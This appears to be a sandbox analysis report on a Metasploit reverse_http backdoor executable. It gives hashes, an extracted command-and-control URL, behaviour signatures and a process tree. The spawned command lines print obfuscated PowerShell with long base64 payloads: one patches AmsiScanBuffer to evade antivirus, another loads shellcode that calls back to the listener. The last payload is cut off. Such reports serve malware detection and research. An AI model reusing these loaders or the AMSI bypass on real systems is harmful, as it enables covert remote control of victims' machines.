metasploit | bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f

Analysis

max time kernel
152s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
10-05-2022 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe
Size

132KB
MD5

16ccf895c611653f2a66382197c07e0e
SHA1

7a5ceee5c6529c73896576f784fa928772420d53
SHA256

bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f
SHA512

d8d2b49be5a3e9d488641901d69666952e846d8321a31afe31d2469c3bc8d81ca8f874c3c2d8794a6b440a384d92631a7e205bfa2e9f4169f3343e73a48a236e

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

http://192.168.1.104:4443/uS5IL2wUHPkVVRRUSicq6Qe411BGLKmICQrPFFVNmJ9MzHeUQP8tdis96mz3EDdFp1kvEC5_BDPOpJIxZHFW1lrr-raGFGTKsNRDgYETKTImtafjAhSf1yIJM7PUF1FO3N3dvO5ZRqc55-zlcwgkx1jasZFOdL6TxbTTAVMLyS40rcJfBtul1dpYesb8U6AMXzqW76qa19B94C9p9se05SRqa-wdcno

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3180	powershell.exe
3180	powershell.exe
2408	powershell.exe
2408	powershell.exe
2140	powershell.exe
2140	powershell.exe
332	powershell.exe
332	powershell.exe
5012	powershell.exe
5012	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.execmd.exepowershell.exepowershell.execsc.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 4220 wrote to memory of 700	4220	bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe	cmd.exe
PID 4220 wrote to memory of 700	4220	bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe	cmd.exe
PID 700 wrote to memory of 3180	700	cmd.exe	powershell.exe
PID 700 wrote to memory of 3180	700	cmd.exe	powershell.exe
PID 3180 wrote to memory of 2408	3180	powershell.exe	powershell.exe
PID 3180 wrote to memory of 2408	3180	powershell.exe	powershell.exe
PID 2408 wrote to memory of 4524	2408	powershell.exe	csc.exe
PID 2408 wrote to memory of 4524	2408	powershell.exe	csc.exe
PID 4524 wrote to memory of 660	4524	csc.exe	cvtres.exe
PID 4524 wrote to memory of 660	4524	csc.exe	cvtres.exe
PID 700 wrote to memory of 2140	700	cmd.exe	powershell.exe
PID 700 wrote to memory of 2140	700	cmd.exe	powershell.exe
PID 2140 wrote to memory of 332	2140	powershell.exe	powershell.exe
PID 2140 wrote to memory of 332	2140	powershell.exe	powershell.exe
PID 332 wrote to memory of 5012	332	powershell.exe	powershell.exe
PID 332 wrote to memory of 5012	332	powershell.exe	powershell.exe
PID 332 wrote to memory of 5012	332	powershell.exe	powershell.exe
PID 5012 wrote to memory of 1412	5012	powershell.exe	csc.exe
PID 5012 wrote to memory of 1412	5012	powershell.exe	csc.exe
PID 5012 wrote to memory of 1412	5012	powershell.exe	csc.exe
PID 1412 wrote to memory of 5024	1412	csc.exe	cvtres.exe
PID 1412 wrote to memory of 5024	1412	csc.exe	cvtres.exe
PID 1412 wrote to memory of 5024	1412	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe
"C:\Users\Admin\AppData\Local\Temp\bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B9BF.tmp\B9C0.tmp\B9C1.bat C:\Users\Admin\AppData\Local\Temp\bf6146957bfcc10ee8a284e1e8c1bfeb3330593ce3eac4187d9871a46e94297f.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv noF -;sv OQn ec;sv tUC ((gv noF).value.toString()+(gv OQn).value.toString());powershell (gv tUC).value.toString() ('JABNAEMAWgBWAEoATABmAFEAdABJACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgAiACsAIgBlACIAKwAiAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgAiACsAIgBlACIAKwAiAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AIgArACIAZQAiACsAIgBsADMAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJABNAEMAWgBWAEoATABmAFEAdABJADsAJABYAEsAeQBXAEoAaABBAEQAbQAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQAiACsAIgBzACIAKwAiAGkALgBkACIAKwAiAGwAIgArACIAbAAiACkALAAgACIAQQBtACIAKwAiAHMAIgArACIAaQBTAGMAYQBuAEIAdQAiACsAIgBmACIAKwAiAGYAZQByACIAKQA7ACQAZQBTAHYAbQBuAFoAVwAgAD0AIAAwADsAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABYAEsAeQBXAEoAaABBAEQAbQAsACAAWwB1AGkAbgB0ADMAMgBdAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABlAFMAdgBtAG4AWgBXACkAOwAkAHQAawB5AFkAQwB0AFQASQAgAD0AIAAoACIAfQBCADgALAAgAH0ANQA3ACwAIAB9ADAAMAAsACAAfQAwADcALAAgAH0AOAAwACwAIAB9AEMAMwAiACkALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAgACIAMAB4ACIAKQA7ACQAdABrAHkAWQBDAHQAVABJACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoACQAdABrAHkAWQBDAHQAVABJACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQAdABrAHkAWQBDAHQAVABJACwAIAAwACwAIAAkAFgASwB5AFcASgBoAEEARABtACwAIAA2ACkA')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABNAEMAWgBWAEoATABmAFEAdABJACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgAiACsAIgBlACIAKwAiAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgAiACsAIgBlACIAKwAiAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AIgArACIAZQAiACsAIgBsADMAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJABNAEMAWgBWAEoATABmAFEAdABJADsAJABYAEsAeQBXAEoAaABBAEQAbQAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQAiACsAIgBzACIAKwAiAGkALgBkACIAKwAiAGwAIgArACIAbAAiACkALAAgACIAQQBtACIAKwAiAHMAIgArACIAaQBTAGMAYQBuAEIAdQAiACsAIgBmACIAKwAiAGYAZQByACIAKQA7ACQAZQBTAHYAbQBuAFoAVwAgAD0AIAAwADsAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABYAEsAeQBXAEoAaABBAEQAbQAsACAAWwB1AGkAbgB0ADMAMgBdAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABlAFMAdgBtAG4AWgBXACkAOwAkAHQAawB5AFkAQwB0AFQASQAgAD0AIAAoACIAfQBCADgALAAgAH0ANQA3ACwAIAB9ADAAMAAsACAAfQAwADcALAAgAH0AOAAwACwAIAB9AEMAMwAiACkALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAgACIAMAB4ACIAKQA7ACQAdABrAHkAWQBDAHQAVABJACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoACQAdABrAHkAWQBDAHQAVABJACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQAdABrAHkAWQBDAHQAVABJACwAIAAwACwAIAAkAFgASwB5AFcASgBoAEEARABtACwAIAA2ACkA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m3sj4fou\m3sj4fou.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC691.tmp" "c:\Users\Admin\AppData\Local\Temp\m3sj4fou\CSC9B646813232947F9A8AD6C6C597671C.TMP"
6⤵
PID:660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv noF -;sv OQn ec;sv tUC ((gv noF).value.toString()+(gv OQn).value.toString());powershell (gv tUC).value.toString() ('JABOAFMAPQAnACQASgBvAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsACIAKwAiAGwAIgArACIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbAAiACsAIgBsACIAKwAiACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABxAGsAZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAYgBuAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADYAZQAsAH0ANgA1ACwAfQA3ADQALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADkALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQAzADEALAB9AGQAYgAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9AGUAOAAsAH0AMwBlACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA0AGQALAB9ADYAZgAsAH0ANwBhACwAfQA2ADkALAB9ADYAYwAsAH0ANgBjACwAfQA2ADEALAB9ADIAZgAsAH0AMwA1ACwAfQAyAGUALAB9ADMAMAAsAH0AMgAwACwAfQAyADgALAB9ADUANwAsAH0ANgA5ACwAfQA2AGUALAB9ADYANAAsAH0ANgBmACwAfQA3ADcALAB9ADcAMwAsAH0AMgAwACwAfQA0AGUALAB9ADUANAAsAH0AMgAwACwAfQAzADYALAB9ADIAZQAsAH0AMwAxACwAfQAzAGIALAB9ADIAMAAsAH0ANQA0ACwAfQA3ADIALAB9ADYAOQAsAH0ANgA0ACwAfQA2ADUALAB9ADYAZQAsAH0ANwA0ACwAfQAyAGYALAB9ADMANwAsAH0AMgBlACwAfQAzADAALAB9ADMAYgAsAH0AMgAwACwAfQA3ADIALAB9ADcANgAsAH0AMwBhACwAfQAzADEALAB9ADMAMQAsAH0AMgBlACwAfQAzADAALAB9ADIAOQAsAH0AMgAwACwAfQA2AGMALAB9ADYAOQAsAH0ANgBiACwAfQA2ADUALAB9ADIAMAAsAH0ANAA3ACwAfQA2ADUALAB9ADYAMwAsAH0ANgBiACwAfQA2AGYALAB9ADAAMAAsAH0ANgA4ACwAfQAzAGEALAB9ADUANgAsAH0ANwA5ACwAfQBhADcALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANgBhACwAfQAwADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADUAYgAsAH0AMQAxACwAfQAwADAALAB9ADAAMAAsAH0AZQA4ACwAfQA3ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAZgAsAH0ANwA1ACwAfQA1ADMALAB9ADMANQAsAH0ANAA5ACwAfQA0AGMALAB9ADMAMgAsAH0ANwA3ACwAfQA1ADUALAB9ADQAOAAsAH0ANQAwACwAfQA2AGIALAB9ADUANgAsAH0ANQA2ACwAfQA1ADIALAB9ADUAMgAsAH0ANQA1ACwAfQA1ADMALAB9ADYAOQAsAH0ANgAzACwAfQA3ADEALAB9ADMANgAsAH0ANQAxACwAfQA2ADUALAB9ADMANAAsAH0AMwAxACwAfQAzADEALAB9ADQAMgAsAH0ANAA3ACwAfQA0AGMALAB9ADQAYgAsAH0ANgBkACwAfQA0ADkALAB9ADQAMwAsAH0ANQAxACwAfQA3ADIALAB9ADUAMAAsAH0ANAA2ACwAfQA0ADYALAB9ADUANgAsAH0ANABlACwAfQA2AGQALAB9ADQAYQAsAH0AMwA5ACwAfQA0AGQALAB9ADcAYQAsAH0ANAA4AC'+'wAfQA2ADUALAB9ADUANQAsAH0ANQAxACwAfQA1ADAALAB9ADMAOAAsAH0ANwA0ACwAfQA2ADQALAB9ADYAOQAsAH0ANwAzACwAfQAzADkALAB9ADMANgAsAH0ANgBkACwAfQA3AGEALAB9ADMAMwAsAH0ANAA1ACwAfQA0ADQALAB9ADYANAAsAH0ANAA2ACwAfQA3ADAALAB9ADMAMQAsAH0ANgBiACwAfQA3ADYALAB9ADQANQAsAH0ANAAzACwAfQAzADUALAB9ADUAZgAsAH0ANAAyACwAfQA0ADQALAB9ADUAMAAsAH0ANABmACwAfQA3ADAALAB9ADQAYQAsAH0ANAA5ACwAfQA3ADgALAB9ADUAYQAsAH0ANAA4ACwAfQA0ADYALAB9ADUANwAsAH0AMwAxACwAfQA2AGMALAB9ADcAMgAsAH0ANwAyACwAfQAyAGQALAB9ADcAMgAsAH0ANgAxACwAfQA0ADcALAB9ADQANgAsAH0ANAA3ACwAfQA1ADQALAB9ADQAYgAsAH0ANwAzACwAfQA0AGUALAB9ADUAMgAsAH0ANAA0ACwAfQA2ADcALAB9ADUAOQAsAH0ANAA1ACwAfQA1ADQALAB9ADQAYgAsAH0ANQA0ACwAfQA0ADkALAB9ADYAZAAsAH0ANwA0ACwAfQA2ADEALAB9ADYANgAsAH0ANgBhACwAfQA0ADEALAB9ADYAOAAsAH0ANQAzACwAfQA2ADYALAB9ADMAMQAsAH0ANwA5ACwAfQA0ADkALAB9ADQAYQAsAH0ANABkACwAfQAzADcALAB9ADUAMAAsAH0ANQA1ACwAfQA0ADYALAB9ADMAMQAsAH0ANAA2ACwAfQA0AGYALAB9ADMAMwAsAH0ANABlACwAfQAzADMALAB9ADYANAAsAH0ANwA2ACwAfQA0AGYALAB9ADMANQAsAH0ANQBhACwAfQA1ADIALAB9ADcAMQAsAH0ANgAzACwAfQAzADUALAB9ADMANQAsAH0AMgBkACwAfQA3AGEALAB9ADYAYwAsAH0ANgAzACwAfQA3ADcALAB9ADYANwAsAH0ANgBiACwAfQA3ADgALAB9ADMAMQAsAH0ANgBhACwAfQA2ADEALAB9ADcAMwAsAH0ANQBhACwAfQA0ADYALAB9ADQAZgAsAH0ANgA0ACwAfQA0AGMALAB9ADMANgAsAH0ANQA0ACwAfQA3ADgALAB9ADYAMgAsAH0ANQA0ACwAfQA1ADQALAB9ADQAMQAsAH0ANQA2ACwAfQA0AGQALAB9ADQAYwAsAH0ANwA5ACwAfQA1ADMALAB9ADMANAAsAH0AMwAwACwAfQA3ADIALAB9ADYAMwAsAH0ANABhACwAfQA2ADYALAB9ADQAMgAsAH0ANwA0ACwAfQA3ADUALAB9ADYAYwAsAH0AMwAxACwAfQA2ADQALAB9ADcAMAAsAH0ANQA5ACwAfQA2ADUALAB9ADcAMwAsAH0ANgAyACwAfQAzADgALAB9ADUANQAsAH0AMwA2ACwAfQA0ADEALAB9ADQAZAAsAH0ANQA4ACwAfQA3AGEALAB9ADcAMQAsAH0ANQA3ACwAfQAzADcALAB9ADMANgAsAH0ANwAxACwAfQA2ADEALAB9ADMAMQAsAH0AMwA5ACwAfQA0ADIALAB9ADMAOQAsAH0AMwA0ACwAfQA0ADMALAB9ADMAOQAsAH0ANwAwACwAfQAzADkALAB9ADcAMwAsAH0ANgA1ACwAfQAzADAALAB9ADMANQAsAH0ANQAzACwAfQA1ADIALAB9ADcAMQAsAH0ANgAxACwAfQAyAGQALAB9ADcANwAsAH0ANgA0ACwAfQA2ADMALAB9ADYAZQAsAH0ANgBmACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQA1ADcALAB9ADgAOQAsAH0AOQBmACwAfQBjADYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADkALAB9AGMANgAsAH0ANQAzACwAfQA2ADgALAB9ADAAMAAsAH0AMwAyACwAfQBlADgALAB9ADgANAAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA3ACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQBlAGIALAB9ADUANQAsAH0AMgBlACwAfQAzAGIALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADYALAB9ADYAYQAsAH0AMABhACwAfQA1AGYALAB9ADYAOAAsAH0AOAAwACwAfQAzADMALAB9ADAAMAAsAH0AMAAwACwAfQA4ADkALAB9AGUAMAAsAH0ANgBhACwAfQAwADQALAB9ADUAMAAsAH0ANgBhACwAfQAxAGYALAB9ADUANgAsAH0ANgA4ACwAfQA3ADUALAB9ADQANgAsAH0AOQBlACwAfQA4ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADQALAB9ADYAOAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBjAGQALAB9AGUAOAAsAH0ANABhACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0AMAAwACwAfQAwADAALAB9ADQAMAAsAH0AMAAwACwAfQA1ADMALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADUAMwAsAH0AOAA5ACwAfQBlADcALAB9ADUANwAsAH0AN